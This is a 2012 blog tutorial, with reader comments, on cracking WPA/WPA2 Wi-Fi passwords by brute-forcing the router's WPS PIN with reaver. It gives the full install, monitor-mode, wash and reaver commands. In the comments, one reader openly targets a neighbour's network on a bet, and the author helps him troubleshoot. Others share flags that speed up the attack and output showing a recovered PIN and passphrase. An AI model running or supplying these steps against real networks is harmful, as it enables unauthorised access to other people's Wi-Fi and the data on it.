Thursday, April 5, 2012

Easily Crack WPA Or WPA2 PSK Under 10 Hours

WPA or even WPA2 can be easily cracked under 10 hours provided that WPS is enabled on the router. The software we'll use is reaver.

The hardware I'm using is Intel(R) PRO/Wireless 3945ABG/BG on Ubuntu 11.04 and driver is iwl3945.

First install the necessary libraries to compile the software. Run the following command in terminal to do so.
sudo apt-get install libsqlite3-dev libpcap0.8-dev build-essential
Now open terminal and go inside /tmp folder.
Download reaver from here by running the command wget -c http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=
Now extract it by running tar xf reaver-1.4.tar.gz 
Now run the following commands to compile the software.
./configure
make
sudo make install
After this reaver will be installed on your system.
Now let's install aircrack-ng(Optional). We'll not be using aircrack directly but use its tool to assist our cracking. You can install it by running:
sudo apt-get install aircrack-ng
Now comes the attacking part.

First of all we have to enable monitor mode on our wireless interface. To do so run sudo airomon-ng start wlan0 . This will create a new interface mon0 (ath0 in other drivers) with monitor mode enabled.

You can also use ifconfig command to bring the interface in monitor mode. Aircrack-ng will not be required in this way.

Now let's check if the AP has WPS support. Run the command  sudo wash -i mon0 --ignore-fcs
If the AP doesn't support WPS it won't be listed here. If its listed then the AP supports WPS and can be cracked. Just note the channel and BSSID of the AP you want.

Now lets run reaver command. sudo reaver -i mon0  -b bssid-you-noted-above  -vv -c channel-you-noted-above  --no-nacks
Now the software will start brute forcing the PIN and will generate the WPA/WPA2 PSK in less than 10 hours.

36 comments:

  1. hey a similar post I wrote here:
    http://shambool.com/2012/04/08/reaver-on-ubuntu-cracking-wpawpa2-wifi-nets/

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete
  5. I have a question that has been asked on other websites but I have not found an answer.
    I bet my neighbor $100 I could get his password knowing WPS was enabled. The signal strength is low, about -80. I'm at 33% after a few days, no problem it just runs in the background. I was just wondering if Reaver has to reach 100% or is it similar to a WEP crack where it gives the information as soon as it is acquired? Could I possibly get it at 50%?

    ReplyDelete
    Replies
    1. Reaver is also a brute forcing software. It exploits WPS to crack the key in short time. So yes you don't have to reach 100%. If you're lucky you might get it at 50%. Alternatively you can also manually give it PIN to try by passing PIN as -p

      Delete
    2. I knew about entering it manually. Thank you for the percentage answer, I figured that was the case but I keep reading on the google source page about people getting to 90-100% so I wasn't sure. I guess we'll see how long it takes when it gets there.
      I'm sitting at 50% now, I found a code to speed it up a bit.

      Thanks again

      Delete
    3. I've managed to crack before 100% :D. BTW how did you speed it up?

      Delete
    4. Well I started with reaver -i mon1 -b xx:xx:xx:xx:xx:x -vv like everyone which helps understand how Reaver works.
      Then after reading a few posts and going through the codes I tried a few methods to decrease the delay. Here are the two codes that have worked best for me. I went from over 200 sec/pin to under 60sec/pin.

      reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c1 -d 0> (changes the delay from 1 sec to 0)

      reaver -i mon0 -b xx:xx:xx:xx:xx:xx -w -N -S -l 300 (This has been the best so far, I found this code from another post.)

      Delete
    5. Did you mean -l 30 as oppose to -l 300 in above command?

      Delete
    6. Nope -l 300 worked for me just fine.

      I actually came back because I finished my crack. I hate when people ask questions and don't come back with their solution.

      using reaver -i mon0 -b xx:xx:xx:xx:xx:xx -w -N -S -l 300 from a router only giving out -84 power got down to 15/sec pin. It made it to 65% then jumped directly to 90% after it found the first 4 digits. When it finished I was given the WPS key only, then I used the one pin command to get the password. Here is what my experience looked like.

      [+] 65.42% complete @ 2012-06-07 14:33:30 (18 seconds/pin)
      [+] 65.46% complete @ 2012-06-07 14:33:56 (18 seconds/pin)
      [+] 90.93% complete @ 2012-06-07 14:34:55 (18 seconds/pin)
      [+] 90.96% complete @ 2012-06-07 14:35:19 (18 seconds/pin)
      then
      [+] 97.12% complete @ 2012-06-07 15:51:09 (15 seconds/pin)
      [+] WPS PIN: 'pinxxxxx'
      then I typed:
      reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv -T 2 -p (pin)
      which brought me to:
      [+] Sending identity response
      [+] Received M1 message
      [+] Sending M2 message
      [+] Received M3 message
      [+] Sending M4 message
      [+] Received M5 message
      [+] Sending M6 message
      [+] Received M7 message
      [+] Sending WSC NACK
      [+] Sending WSC NACK
      [+] Pin cracked in 103 seconds
      [+] WPS PIN: 'pinxxxxx'
      [+] WPA PSK: 'password'
      [+] AP SSID: 'name of network'
      [+] Nothing done, nothing to save.

      Delete
    7. Great and congrats. I'll try with -300 today.

      Delete
    8. For me -30 was 4/5 sec per key while -300 was 9/10 sec per key.

      Delete
  6. hey,
    first of all thanks for this guide :)
    i'm sorry to say that it doesn't seem to work for me, could you take a look and tell me what i am doing wrong?

    [+] Switching mon3 to channel 1
    [+] Waiting for beacon from xxxxxxxx
    [+] Associated with xxxxxxxxxx (ESSID: xxxxxx)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin




    what does that mean?

    would be grateful for every help :)

    ReplyDelete
    Replies
    1. Do you have good signal strength?

      Delete
    2. Hello, I have been receiving this same message and it keeps loop tried all other reaver option above(including the default and faster code). My power stated on airodump is like 50-70. My modem is actually just within 10-15 steps basicly just very very near to me. Had my WPS enabled but unable to brute force it? :/

      Delete
    3. I'm not sure. Sometimes changing the position has helped me. Why don't you try it once.

      Delete
    4. Okay, had work(sort of I guess) but now it has been all day staying at 99.99% since 6pm.
      [+] 99.99% complete @ 2012-09-26 22:38:09 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:38:47 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:39:27 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:40:01 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:40:43 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:41:21 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:41:50 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:42:37 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:43:24 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:44:17 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:44:47 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:45:18 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:45:49 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:46:58 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:47:47 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:48:38 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:49:29 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:50:09 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:50:52 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:51:46 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:52:34 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:53:04 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:53:27 (24 seconds/pin)

      what did I did wrong this time ><

      Delete
    5. Same thing happened with me with one AP as well. Either it wouldn't brute force at all or stuck at 99.99% . I even tried without resuming as well but to no avail.

      Delete
    6. Alright, I'll try with another AP and come back with results. :)

      Delete
    7. still can't work~ :X it either stop at certain percentage after running sometime or it wont start at all

      Delete
  7. This comment has been removed by a blog administrator.

    ReplyDelete
  8. how to install reaver without internet in backtrack 5?

    ReplyDelete
    Replies
    1. Since Backtrack is based on Debian, you can get hold of .deb files for Reaver and its dependencies and install offline.

      Delete
    2. i'm new to backtrack, but this worked for me. first you download reaver. i used reaver1.4.tar.gz. copy the downloaded fle to the desktop in a new folder. Rename the folder "reaver", and then
      > open a terminal.
      > go to the desktop directory in terminal, by typing cd Desktop
      (hit enter after every command line)

      cd reaver

      tar -zxf reaver-1.4.tar.gz

      cd reaver-1.4

      cd src

      ./configure

      make && make install

      Delete
    3. Great. Thanks for answering back.

      Delete
  9. does ubuntu 12.04 supports the processes?

    ReplyDelete
  10. This comment has been removed by a blog administrator.

    ReplyDelete
  11. How to open terminal? and what's that?

    ReplyDelete
    Replies
    1. If you are using windows open command prompt.

      Delete
  12. This comment has been removed by the author.

    ReplyDelete
  13. Please, Command line Steps on how to install on window.

    ReplyDelete
    Replies
    1. Download reaver binary for Windows. Rest of the instructions should be the same.

      Delete